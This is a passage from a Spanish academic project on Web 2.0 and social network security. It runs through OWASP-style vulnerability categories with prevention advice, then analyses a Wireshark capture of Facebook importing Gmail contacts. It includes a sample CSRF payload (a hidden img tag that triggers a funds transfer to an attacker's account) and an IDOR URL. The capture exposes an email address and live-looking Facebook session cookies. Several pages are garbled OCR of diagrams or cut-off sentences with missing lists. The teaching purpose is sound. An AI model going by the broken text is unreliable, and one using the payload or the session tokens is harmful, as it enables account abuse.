Lo primero que tendremos que hacer será proteger las credenciales y los identificadores (IDs)
de sesión:
Página 192
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Deberemos considerar los privilegios que tienen los usuarios que acceden a
nuestro sistema dependiendo de si tienen acceso total o parcial a determinados ficheros.
d. Impacto técnico: Estas vulnerabilidades pueden comprometer todos los datos que pueden
ser referenciados por la referencia directa. A menos que el espacio de nombres sea escaso, es
fácil para un atacante tener acceso a todos los datos disponibles de ese tipo mediante la ruta
mostrada en la URL.
e. Impacto del negocio: Dependerá del valor de los datos afectados y de los datos
procesados. Podría dañar la reputación de la empresa.
Página 193
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
La mejor manera de averiguar si una aplicación es vulnerable a las referencias directas a
objetos inseguras es verificar que las referencias a todos los objetos tienen defensas
apropiadas.
- Para las referencias directas a los recursos restringidos, la aplicación necesita verificar
si el usuario está autorizado para acceder a los recursos exactos que se han solicitado.
- Si la referencia es indirecta, la asignación desde la referencia directa deberá limitar los
valores autorizados para la revisión del usuario. La revisión de código de la aplicación,
deberá comprobar rápidamente si uno u otro enfoque se llevan con seguridad.
Los test también son eficaces para identificar referencias de objetos directos y ver so seguras
o no. El problema es que las herramientas automatizadas normalmente no buscan tales
defectos, porque no pueden reconocer lo que requiere de protección o lo que es seguro o no
es seguro.
PreparedStatementpstmt=connection.prepareStatement(query , … );
pstmt.setString( 1, request.getparameter("acct"));
ResultSetresults = pstmt.executeQuery( );
http://miPFCweb20.es/app/accountInfo?numeroDeCuenta=notmynumeroDeCuent
a
Página 194
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Podría tratarse de cualquier persona que pueda engañar a los usuarios a
presentar una solicitud en su sitio Web.
b. Ataque: El atacante crea un conjunto de peticiones HTTP. Envían estas peticiones a través
de etiquetas de imágenes falseadas, XSS u otras técnicas para que acceda así a su página web.
Si el usuario estuviera autenticado el atacante podría tener éxito.
c. Debilidad de la seguridad: Este ataque toma ventaja cuando las aplicaciones Web
permiten a los atacantes predecir todos los detalles de una acción en particular.
Desde navegadores que envían credenciales automáticamente como cookies de sesión, los
atacantes pueden crear páginas Web maliciosas que generan peticiones HTTP invisibles para
el usuario final.
Detectar los fallos de CSRF es bastante fácil a través de test de penetración o análisis de
código.
d. Impacto técnico: Los atacantes podría cambiar cualquier dato o acceder a los servicios del
sistema al que esté autorizada la victima, es decir, dependiendo de los privilegios de esta.
e. Impacto del negocio: Considerando el valor del negocio de los datos afectados o funciones
de la aplicación el impacto será menor o mayor. Puede dañar la reputación de la empresa.
¿Soy vulnerable?
La manera más fácil de comprobar si una aplicación es vulnerable es ver si cada link y
formulario contiene un token impredecible para cada usuario. Si esto es así los atacantes
pueden realizar peticiones maliciosas. Centrarse en los vínculos y en las formas que
representan funciones cambiando el estado, ya que esos son los objetivos más importantes
del CSRF.
Habrá que verificar las operaciones que se realizan en varios pasos, ya que no son inmunes a
estos ataques. Los atacantes pueden fácilmente realizar una serie de peticiones mediante el
uso de varias etiquetas o uso de JavaScript.
Página 195
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
http://miPFCweb20.es/aplicacion/transferenciaFondos?cantidad=1500&dest
inoCuenta=5498720
<imgsrc="http://universidadX.es/aplicacion/
transferenciaFondos?cantidad=1500&destinoCuenta=cuentaAtacante“width="
0" height="0" />
Si la victima visita alguno de esos sitios donde aún estaba autenticado como example.com, las
solicitudes de HTTP incluirán información del usuario de sesión sin darse cuenta que se
autorizan esas solicitudes.
Página 196
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Ante un evento de error en un servidor se puede mostrar información al usuario que puede ser
útil a la hora de realizar ataques más sofisticados. Por ejemplo, podemos ver el típico error de
MySQL que muestra toda la consulta entera por pantalla lo que da datos al atacante que no
queremos que sean mostrados.
Escenario
a. Atacante: Atacantes externos anónimos y usuarios con sus propias cuentas que puedan
intentar poner en peligro el sistema.
b. Ataque: El atacante accede a las cuentas por defecto, páginas no usadas, parches
desactualizados con errores, archivos y directorios sin protección, etc. El atacante obtiene así
el acceso no autorizado o el conocimiento del sistema.
d. Impacto técnico: Estos defectos suelen dar a los atacantes acceso de manera no
autorizada a algunos datos del sistema o funcionalidades de éste. En ocasiones, los defectos
son el resultado de un completo sistema puesto en manos del atacante.
e. Impacto del negocio: El sistema podría estar completamente comprometido sin que la
empresa lo sepa, sus datos podrían ser robados o modificados.
Página 197
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
Hay que preguntarse si se ha llevado a cabo un nivel de seguridad para todas las fases del
desarrollo de la aplicación:
Página 198
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Si pensamos en los usuarios del sistema ¿Podrían tener acceso a los datos
protegidos a los que no están autorizados?
c. Debilidad de la seguridad: El error más común es no cifrar os datos que se deben cifrar. Y
cuando se hace, la generación del cifrado y el almacenamiento de claves se hace de manera
insegura; no se rotan las claves y se utilizan algoritmos de cifrado débil. El uso de funciones
hash débiles para proteger contraseñas es también común. Atacantes externos tiene
dificultad de detectar tales defectos debido al acceso restringido. Por lo general, deben
explotar otra cosa antes de tener el acceso necesario a estos datos.
e. Impacto del negocio: Habrá que tener en cuenta el valor comercial de los datos perdidos y
su reputación. ¿Cuál es la responsabilidad legal si se exponen esos datos? Podría ser dañada la
reputación de la empresa.
Página 199
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
Lo primero que tendremos que analizar es el nivel de sensibilidad de los datos para ver si
necesitan ser cifrados o no, dependiendo si son contraseñas, número de tarjetas de crédito o
información personal, que según la LOPD (Ley Orgánica de Protección de Datos) deberemos
garantizar su seguridad en todo momento.
- Consideraremos las amenazas que afectan a nuestros datos y las qué queremos
proteger cifrando así los datos involucrados en éstas amenazas.
- Las copias de seguridad que se manejen de manera externa, por ejemplo podemos
hablar de Cloud Computing, tendrá que hacerse de manera cifrada.
- Deberemos garantizar que el algoritmo de cifrado sea robusto.
- Las contraseñas se deberán almacenar mediante una función hash y protegerlas de
accesos no autorizados.
Página 200
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La detección de tales defectos se puede realizar de manera fácil. La parte más difícil de esta
vulnerabilidad, es identificar qué URLs existen para atacar.
d. Impacto técnico: Los defecto que permiten a los atacantes acceso no autorizado a
determinadas funciones administrativas pueden ser objetivos claves para este tipo de
ataques.
e. Impacto del negocio: Deberemos considerar el valor de negocio de las funciones y los
datos expuestos que procesan en la empresa. Podría ser daña la reputación de la
organización.
Página 201
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
La mejor manera de ver si una aplicación está expuesta a este tipo de ataque es comprobando
las páginas del sitio Web.
Veamos por cada página si es pública o privada. Si se tratara de una página privada
deberemos analizar:
- ¿Hay autenticación con usuario y contraseña para acceder a esa página privada?
- ¿Podría acceder a ella cualquier usuario autenticado? Dependiendo del tipo de usuario
deberá incluir unos permisos de acceso u otros.
Tendremos que analizar si los mecanismos de acceso están correctamente configurados para
cada página mediante test de penetración y analizar el código por cada página.
http://miPFCweb20.es/app/getappInfo
http://miPFCweb20.es/app/admin_getappInfo
Página 202
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Se podría dar el caso de que cualquier persona que pueda supervisar el tráfico de
la red de sus usuarios.
b. Ataque: La monitorización del tráfico de la red de los usuarios puede ser difícil, pero en
ocasiones no lo es tanto. La dificultad principal radica en el seguimiento del tráfico de la red
adecuada, mientras los usuarios están accediendo al sitio vulnerable.
Con frecuencia, las aplicaciones nos protegen el tráfico de red. Si utilizan SSL/TLS (Secure
Socket Layer/Transport Layer Security) durante la autenticación, pero no en otros lugares,
posibilitan que datos sensibles e identificadores de sesión puedan ser interceptados. A
menudo, también se utilizan certificados expirados o configurados incorrectamente.
El detectar estos fallos básicos es fácil. Con sólo observar el tráfico del sitio web de la red
.
valdría en determinadas ocasiones. Otros defectos más sutiles ya requieren inspeccionar el
diseño de la aplicación y la configuración del servidor.
d. Impacto técnico: Se podrían exponer datos de los usuarios al atacante y llevar a cabo el
robo de cuentas. Si una cuenta de administrador se ha visto comprometida, todo el sitio
puede estar expuesto. Una mala configuración de SSL también puede facilitar ataques de
phishing y Man In The Middle.
e. Impacto del negocio: Deberemos tener en cuenta el valor comercial de los datos expuestos
de la organización referentes a su confidencialidad.
Página 203
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Soy vulnerable?
, pero
siguiente:
Página 204
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Escenario
a. Atacante: Cualquier persona que pueda engañar a los usuarios a presentar una solicitud a
su sitio Web.
b. Ataque: El atacante, redirecciona a links no validados y engaña a las víctimas para que
hagan clic en él. El atacante envía a la víctima a páginas inseguras y así podrá eludir los
controles de seguridad.
c. Debilidad de la seguridad: Las aplicaciones que se usan con frecuencia pueden redirigir los
usuarios a otras páginas. Algunas veces la página de destino se especifica en un parámetro no
validado, permitiendo a los atacantes elegir dicha página.
Detectar redirecciones sin control es fácil. Buscaremos redirecciones donde se puede poner
una URL completa.
e. Impacto del negocio: Deberemos tener en cuenta el valor comercial de los datos expuestos
de la organización referentes a su confidencialidad.
¿Soy vulnerable?
La mejor manera de averiguar si una aplicación tiene redirecciones no validadas es:
Página 205
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Podemos elaborar una serie de consejos generales para no exponer nuestro sistema a
vulnerabilidades, por parte de los administradores, a grandes rasgos:
Si nos centramos más en el lado del usuario final podemos tomar las siguientes medidas:
Página 206
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Para consultas parametrizadas usaremos comprobación fuerte de tipos, así que si esperamos
un valor de un determinado rango o longitud, no se acepten otros datos. Permitiremos
siempre los mínimos privilegios aquellas aplicaciones que conecten con nuestras bases de
datos. Habrá que actualizar la contraseña del user Administrador de manera constante. El
usuario que maneje esa base de datos es preferible que sólo tenga permiso de lectura para
hacer consultar y si necesita en un determinado momento modificar esa base de datos se le
pueden otorgar permisos temporalmente.
Cómo dijimos antes hay que separar los posibles datos falsos de los comandos y consultas:
La opción preferida es utilizar una API segura que evite el uso del interprete
completamente o provea una interface parametrizada. Habrá que ser cuidadoso con
APIs, tales como procedimientos almacenados, que son parametrizados, pero que aun
pueden introducir inyección implícitamente.
Si una API parametrizada no se encuentra disponible, se debe cuidadosamente
escapar los caracteres especiales utilizando una sintaxis de escape especial para dicho
intérprete.
Introducir validación positiva o “while list” de entradas al sistema con nombres
estándar apropiados, pero no es una defensa completa ya que muchas aplicaciones
requieren caracteres especiales en sus entradas.
Otro tema importante es evitar mensajes de error detallados, el usuario no tiene porqué saber
qué está pasado por debajo de la Base de Datos, ya que sería información para el atacante,
simplemente informarle de que en ese determinado momento no se le puede mostrar la
información y que en breves momentos estará disponible. El hacker podría obtener
información de la estructura de la Base de Datos, los nombres de las tablas, de los campos,
etc. Esta es la labor más complicada para el atacante.
La prevención requiere mantener los datos de no-confianza separados del contenido activo
del navegador:
Página 207
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Utilizar referencias indirectas por usuario o sesión. Esto evitaría que los atacantes
accedieren directamente a recursos no autorizados. Por ejemplo, en vez de utilizar la
clave del recurso de base de datos, se podría utilizar una lista de 6 recursos que
utilizase los números del 1 al 6 para indicar cuál es el valor elegido por el usuario. La
aplicación tendría que realizar la correlación entre la referencia indirecta con la clave
de la base de datos correspondiente en el servidor.
Comprobar el acceso: cada uso de una referencia de objeto directo de un código no
confiable deberá incluir un control de acceso de usuarios para garantizar que el
usuario está autorizado para el objeto solicitado.
La opción preferida es incluir un único token por cada campo escondido. Esto causará
que el valor mandado en el cuerpo de la solicitud HTTP, evite su inclusión en la
dirección URL que está sujeto a exposición.
El único token puede también ser incluido en la URL él mismo, o en un parámetro de
la URL. Sin embargo, dicha colocación corre el riesgo de que la dirección estará
expuesta a un ataque, comprometiendo así el token.
Página 208
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. Un proceso de endurecimiento repetible que hace que sea rápido y fácil implementar
otro entrono, que esté correctamente bloqueado. Desarrollo, control de calidad y
todos los entornos de producción deben de estar configurados de manera idéntica.
Este proceso debe ser automatizado para reducir al mínimo el esfuerzo necesario para
configurar un nuevo entorno seguro.
2. Un proceso para mantener el seguimiento de la implementación y todas las
actualizaciones y parches de software nuevo de manera oportuna para cada entorno
de desarrollo. Esto debe incluir todas las bibliotecas de código, así, que con frecuencia
se pasa por alto.
3. Una arquitectura de aplicaciones fuerte que proporcione buena separación y la
seguridad entre los componentes.
4. Considerar la realización periódica de exploraciones (scan) y hacer auditorías
periódicas para ayudar a detectar fallos en la configuración o parches que puedan
faltar.
.
Aseg
autorizado.
Página 209
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La a
.
.
Si la pagina forma parte de un proceso de varios pasos, verifique que las condiciones
de la misma se encuentren en el estado apropiado para permitir el acceso.
Página 210
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
n SSL.
Establecer el atributo “secure” en todas las cookies sensibles.
Configurar el servidor SSL para qu
fuertes.
ido, no se encuentre expirado o revocado y que se
ajuste a todos los dominios utilizados por la apl .
Conexiones a sistemas finales (back-
.
.
ros manipulables por el usuario para definir el
destino. Generalmente, esto puede realizarse.
Página 211
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Conclusiones
Evitar estos problemas resulta extremadamente importante ya que son un blanco preferido
por los phishers que intentan ganarse la confianza de los usuarios.
Si todo falla hay que intentar levantar el sistema lo antes posible mediante los bakups que
tengamos disponibles y si hay algo de pérdida de información será mínima. Hay que detectar
el fallo e identificar el origen. Cuantificar el fallo y tomar medidas según la gravedad. Antes de
poner en marcha el sistema mediante bakcup para poder investigar los hechos y poder llegar a
detener al autor del ataque lo primero que hay que hacer es salvaguardar la situación
inmediatamente posterior al ataque para poder realizar la denuncia a la policía, hacer una
copia espejo de la información en ese momento, una imagen o una copia de seguridad y muy
importante hacerlo ante notario para que se vea que no se ha manipulado ningún tipo de
información porque a la empresa le interesaba en ese determinado momento.
Página 212
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Algunos navegadores Web como el navegador Safari de Apple o Chrome de Google, que nos
permiten configurar nuestro inicio de sesión de manera que podamos ver nuestras redes
sociales a modo de inicio, pero esto está más orientado a poder ver las páginas que más
visitamos.
Por otro lado, han surgido varios portales que dan soluciones a este problema de
interconexión de redes sociales aunque no de manera no muy homogénea, lo hacen mediante
gadgets. Permiten una configuración personalizada al completo de inicio como son iGoogle
de Google, Bing.com de Microsoft, iniciativa Netvibes.com. Estas Webs nos permiten
configurar nuestra Web personalizada con todas las redes que elijamos y añadir, a modo de
agregador, blogs para ver los feeds de RSS o Atom, pudiendo interconectar todos los blogs
que deseemos.
Página 213
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 214
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La herramienta más utilizada es Netvibes que nos permite tener una visión global de nuestras
redes sociales y es completamente gratuita. Como vemos hoy en día todo tiende a estar más y
más orientado a los gustos específicos de cada usuario.
También existen determinados plug-ins que nos permiten interconectar algunas redes
sociales. Por ejemplo podemos interconectar Facebook y Twitter, de tal manera que lo que
escribamos en el muro de Facebook se vea reflejado también en Twitter. Simplemente se
hace agregando la aplicación de Facebook dentro de Twitter mediante este enlace
https://twitter.com/widgets/facebook o viceversa, agregando la aplicación de Twitter a
Facebook http://www.facebook.com/apps/application.php?id=2231777543&b&ref=pd_r.
Otra herramienta es Identify, que se trata de un plug-in de Mozilla que podemos descargar de
https://addons.mozilla.org/en-US/firefox/addon/11570/ y que nos permite tener todos los
perfiles de usuarios de redes sociales y otros portales en una misma pantalla.
En la siguiente página podemos ver los mapas web. Estos mapas se incluyen en la
documentación del proyecto a modo de Anexo en formato .pdf para poder verlos con
claridad.
Página 215
Aspectos de seguridad en Web 2.0 y redes sociales 2011
--- --
-
<>
o --- - -
o
o
---
-
IltTorr.nt
Página 216
Aspectos de seguridad en Web 2.0 y redes sociales 2011
.......,c-.....
-~-
,
,
--
1"""'....
l cu~=u
1
,
, ~
:........·1
----
.........
... ..,.,..
_~ ..
L _ _.J 111MJ1'.......
._U. -._
.,.,....._
-___ _ __.. __ _-..__._
............... _.....
... VISUal
,Mapa ... de..la...Web
_
2.0
,.-.-
..
pO<_ _. "
-_--.---"',--
..... .. ......
:f"'---;;.-------
......
---,...
............
_..,. __ - - -..... -u.
............-....,----
-_
............. - ...__..,.... ...- ::::==-_
------,_
...- .. -
~=:==:.:r.,"'.:=:
_ -_ . . _. .
,..-_._-- __....-._
r_,....._--_
""..,..~--~
-..._-- . "...
::_~
"'+r..J- __:__=_:_.._::~
--_
'""-' :r-"-=-_~
__tOO:-'
.....
_";:::.::t_....::
_ _ 0li00I'0AJJ/il
.._..-
~-=::...-
.... .........-_-_
--_
--- .=
""_.I...._ _ ..
~ ..., .. _ - _ .. ~fIMt . . · _ .. "
1_.. ......., 1
-._."--"-" ~:z..~====
.. ............
--'-
-- -.
_~·-
""""""
...
=~.""':::=':'=:=;.=
- ~ _.-
Página 217
12.7. Ejemplo de interconexión Facebook vs GMail
Para verlo esto de manera más sencilla, vamos a crearnos un nuevo perfil en Facebook. Para
ello accedemos a la Web de Facebook, www.facebook.com, e introducimos nuestros datos
personales.
Página 218
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Una vez que introducimos nuestros datos principales lo primero que hace Facebook es
preguntarnos por nuestros contactos de Gmail.
Una vez que esta operación queda realizada nos aparecen todos los contactos que poseen
perfil de Facebook para agregarlos y los que no poseen perfil también nos aparecen para
mandarles una invitación.
Página 219
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Si le preguntamos a Facebook que hace con nuestras contraseñas al agregar estos contactos
nos muestra el siguiente mensaje:
Es decir que en principio Facebook usa la contraseña de GMail una única vez exclusivamente
para exportar los contactos y nunca más.
Si vemos una captura de un sniffer, en concreto Wireshark para analizar cómo se han
realizado estas conexiones entre Facebook y GMail, podemos ver lo siguiente:
Página 220
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Para que quede más claro se han diseñado unos gráficos de red con todas las conexiones
relevantes que se produjeron.
-
192.1158.1.34
8)
9)
(1 O)
rONSl Petición DNS www.facebook .c:om
rTCP' SYN
be ~
Facebook
ServIdor DNS
212.59.199.2
6963 190 10
~
(1 1)
rTCP' SYN + ACK
(1 2) 'TCP' ACK facebook
~
Google
(2 2) 212.59.199.2
rTCP' SYN
(2 7)
(28)
rTCP' SYN + ACK
rTCP' ACK
GoogIe" ~
(29) rTLSvl1 Cllent Helio
Página 221
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
(85 register.facebook.com
rTLSVl] Cllent Helio
6 9.63.190.10
(94)
rTLSvl1 Certlflcate Server Helio Done
-.J
[HTTP' HTll'L1.1 200 OK
(10 3)
( ... )
Servidor DNS
book com edgekey.net 212.59.199.2
[DNS] CNAME 5-statlc.ak;~~~e net A
88.221.10.110
CNAME e566.b.akamale .
(1 70)
(1 80)
JTcP1ACK
- [TLSvll Cllent Helio
facebook
~TLSvl] Server Helio
197)
rTlSvl1 Certificate Server Helio Done
198) .... [TLSVl] Client Key Exchange, Change Clpher Spec
200) Encryoted Handshake Message
(392
fTLSvl1 A licatlon data
re glster.facebook.com (69.63.190.10)
[HTTP' HTT¡>fl.1 200 OK (PNGl register.facebook.com (69.63.190.10)
(394)
-LHTT.!'l GETLcontact-Lmoorte,/sorite ... HTTP/1.1
reglster.facebook.com (69.63.190.10)
rr¡¡¡
(398) fONnA WWW.facebook.com
(40 O) ....
roNsl A Facebook - 69.63.190.14
blCJ Servido, DNS
212.59.199.2
(401
fTC!'lSYN
fTCl'l SYN + ACK Facebook
(407) 69.63.190.14
(408) rTCP) sYN
(411)
[HTTP' GET...Lcontact Imoorte'/sP"'e... H1TP/l.1 facebook
Página 222
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Si analizamos las conexiones, vemos que realiza los siguientes pasos, según el número de
paquete:
Paquete 8: Nuestra IP, 192.168.1.34 hace una petición al servidor DNS para saber
la IP de www.facebook.com.
Paquete 9: El servidor DNS 212.59.199.2 nos contesta con la IP de Facebook que
es 69.63.190.10.
Paquete 10, 11 y 12: Nos conectamos a Facebook mediante TCP con el saludo
inicial “three way handshake” es decir petición SYN-ACK.
Paquete 13: Hacemos una petición GET a Facebook solicitando los contactos de
GMAIL: GET
/contact_importer/api.php?type=1&flow=1&domain_id=&tracked_params=%5B%5D&ap
i_instance=2&login_str=angelescaballero.me%40gmail.com HTTP/1.1
Paquete 15: Facebook manda un ACK genérico mediante TCP a nuestra IP.
Paquete 16: Tenemos un “TCP segment of reassempled PDU”. En ocasiones los
paquetes vienen fragmentados en unidades de PDU (Protocol Data Units) y el
sniffer Wireshark los reensambla.
Paquete 17: Facebook nos manda la cabecera HTTP/1.1 302 Found. El código de
estado 302, nos da la respuesta al código pedido. Los navegadores deberían
seguir la URL que se da en la cabecera de respuesta, interpretando y remplazando
temporalmente esta URL. Básicamente es la respuesta a la petición GET:
Location:
https://www.google.com/accounts/o8/ud?openid.assoc_handle=AOQobUcXcaSsFUanX
WrgrU6m18zcCV1INJXb_9LR3bvHE-
YsKzBaYoAN&openid.claimed_id=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fspecs.openid.net%2Fauth%2F2.0%2Fi
dentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email%
2Cfirst_name%2Clast_name%2Ccountry%2Clanguage%2Cdob&openid.ext0.type.countr
y=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Faxschema.org%2Fcontact%2Fcountry%2Fhome&openid.ext0.type.dob
=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Faxschema.org%2FbirthDate&openid.ext0.type.email=http%3A%2F%2F
axschema.org%2Fcontact%2Femail&openid.ext0.type.first_name=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Faxs
chema.org%2FnamePerson%2Ffirst&openid.ext0.type.language=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Faxsch
ema.org%2Fpref%2Flanguage&openid.ext0.type.last_name=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Faxschema.
org%2FnamePerson%2Flast&openid.identity=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fspecs.openid.net%2Faut
h%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%
2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fopenid.net%2Fsr
v%2Fax%2F1.0&openid.ns.oauth=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fspecs.openid.net%2Fextensions%2Fo
auth%2F1.0&openid.ns.ui=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fspecs.openid.net%2Fextensions%2Fui%2F1
.0&openid.oauth.consumer=www.facebook.com&openid.oauth.scope=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fw
ww.google.com%2Fm8%2Ffeeds%2Fcontacts%2F&openid.realm=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fwww.fac
ebook.com%2F&openid.return_to=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fwww.facebook.com%2Fopenid%2Frec
eiver.php%3Fprovider_id%3D1010459756371%26context%3Dgmail_ci%26protocol%3Dh
ttp%26appdata%3D%257B%2522type%2522%253A1%252C%2522flow%2522%253A1%252C%252
2domain_id%2522%253A1%252C%2522tracked_params%2522%253A%2522%255B%255D%2522
%257D&openid.ui.icon=true&openid.ui.lang=es-ES&openid.ui.mode=popup
Paquete 20: Solicitamos al servidor DNS la IP de Google.www.google.com.
Paquete 21: El DNS nos responde con las IPs de Google del registro CNAME: DNS
Standard query response CNAME www.l.google.com A 66.102.13.104 A
66.102.13.105 A 66.102.13.106 A 66.102.13.147 A 66.102.13.99 A
66.102.13.103
Página 223
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Paquete 22, 27 y 28: Nos conectamos a Google mediante TCP como antes con
Facebook, petición SYN-ACK.
Paquete 29, 31 y 32: Una vez que tenemos establecida la conexión TCP segura,
nos conectamos al servidor de GMail mediante HTTPs, con el protocolo de
conexión segura TLSv1 (Transport Layer Security en su versión 1; este protocolo es
como SSL pero bajo la capa de transporte) para obtener la clave de manera
cifrada. Para conectar al servidor primero realizamos el saludo Cliente Hello por
SSL, Server Hello y Certificate, Server Hello Done por TLS.
Paquete 34, 35: En estos dos paquetes se produce el intercambio seguro de la
clave de GMail. Nuestra IP manda a GMail un paquete TLS “Client Key Exchange,
Change Cipher Spec, Encrypted Handshake Message” y Gmail nos contesta
mediante TLS también “Change Cipher Spec, Encrypted Handshake Message”.
El protocolo TLS es responsable de la autenticación y del intercambio de claves
necesarios para establecer o reanudar sesiones seguras. Cuando se establece una
sesión segura, el protocolo administra lo siguiente:
o Cipher suite negotiation: el cliente y el servidor crean contacto y eligen el
cifrado que se usará a través del intercambio de mensajes.
o Autenticación del servidor y del cliente de manera opcional si se requiere. En
este protocolo el servidor provee su identidad al cliente. El cliente puede
también dar su identidad al servidor. PKI, el uso de Public/Private Key
Pairs, es la autenticación básica aunque se decide en el paso anterior.
o Intercambio de información de sesión de contraseñas. El cliente y el servidor
intercambian números de manera aleatoria y especialmente números
llamados Pre-Master Secret. Estos números son combinados con datos
adicionales permitiendo al cliente y al servidor crear su secreto
compartido llamado Master Secret o “secreto maestro”. El “secreto
maestro” es usado por el cliente y el servidor para generar la MAC secreta,
la clave de sesión se cifra mediante funciones hash, y por otro lado
tenemos la clave correcta, la cual es la clave de sesión usada para la
codificación.
Paquete 39, 41 y 42: Se intercambian paquetes de datos de aplicación,
Application Data.
Paquete 45-68: Se vuelven a reconectar mediante TCP nuestra IP y la de Google.
Probablemente se hayan perdido datos, o haya dado fallo la conexión y el usuario
le dio a reconectar, ya que habitualmente este paso se hace de 1 vez.
Paquete 69 y 71: Nuestra IP realiza una petición GET /common/blank.html
HTTP/1.1 y el servidor de Facebook contesta HTTP/1.1 200 OK.
Paquete 75: Nuestra IP realiza una petición POST al servidor de Facebook
pidiendo los contactos importados y utilizando como podemos ver la tecnología
AJAX: POST /contact_importer/ajax/get_progress.php?__a=1 HTTP/1.1
(application/x-www-form-urlencoded). Las peticiones POST normalmente están
relacionadas con formularios.
Página 224
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 225
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Paquete 411, 412, 415, 418, etc.: Pedimos al servidor la misma petición GET que
en el paquete 395.
A partir del paquete 411, y hasta el final de la captura se produce la misma
solicitud GET de manera constante contestando el servidor en la mayoría de
paquetes 200 ok y muchos paquetes de datos de tipo ACK y paquetes estándar de
tipo “TCP segment of a reassembled PDU”.
GET
/contact_importer/api.php?type=1&flow=1&domain_id=&tracked_params=%5B%5D&api_instance=2&login_st
r=angelescaballero.me%40gmail.com HTTP/1.1Host: www.facebook.comUser-Agent: Mozilla/5.0
(Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5
Safari/531.22.7Referer: http://www.facebook.com/gettingstarted.phpAccept:
application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept
-Language: es-ESAccept-Encoding: gzip, deflateCookie:
__utma=87286159.1097888341.1268354423.1268354423.1268354423.1;
__utmz=87286159.1268354423.1.1.utmccn=(referral)|utmcsr=facebook.com|utmcct=/home.php|utmcmd=ref
erral; c_user=100000933410759; cur_max_lag=2; datr=1268263448-
c9cdaa52d07ff566839913eaf4bc4c5cd06a3f806fd2a1c7420af; lo=PtYu_jC7QvQuVijSZcGUhg; locale=es_ES;
lsd=7wRed; x-referer=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fwww.facebook.com%2F%3Fref%3Dhome%23%2F%3Fref%3Dhome;
xs=2a848faa616da4523674801c8ee2a4faConnection: keep-alive
Página 226
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
post_form_id=40ecb00a5cb545c96372f764e8d4a0f0&fb_dtsg=PSpUg&post_form_id_source=AsyncRequest
Página 227
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Jan 2000 00:00:00 GMTPragma: no-cacheX-Cnection: closeDate: Tue, 06 Apr 2010 21:15:16 GMTfor
(;;);{"error":0,"errorSummary":"","errorDescription":"","errorIsWarning":false,"silentError":0,"
payload":{"progress":{"percent":56,"message":"Encontrando amigos en Facebook"}}}
GET
/contact_importer/ajax/log_actions.php?type=1&flow=1&domain_id=1&import_id=undefined&tracked_par
ams=%5B%5D&ci_tti=12170&asyncSignal=8353&post_form_id=40ecb00a5cb545c96372f764e8d4a0f0
HTTP/1.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES)
AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7Referer:
http://www.facebook.com/gettingstarted.phpAccept: */*Accept-Language: es-ESAccept-Encoding:
gzip, deflateCookie: __utma=87286159.1097888341.1268354423.1268354423.1268354423.1;
__utmz=87286159.1268354423.1.1.utmccn=(referral)|utmcsr=facebook.com|utmcct=/home.php|utmcmd=ref
erral; c_user=100000933410759; cur_max_lag=2; datr=1268263448-
c9cdaa52d07ff566839913eaf4bc4c5cd06a3f806fd2a1c7420af; fb_api_auth_token=;
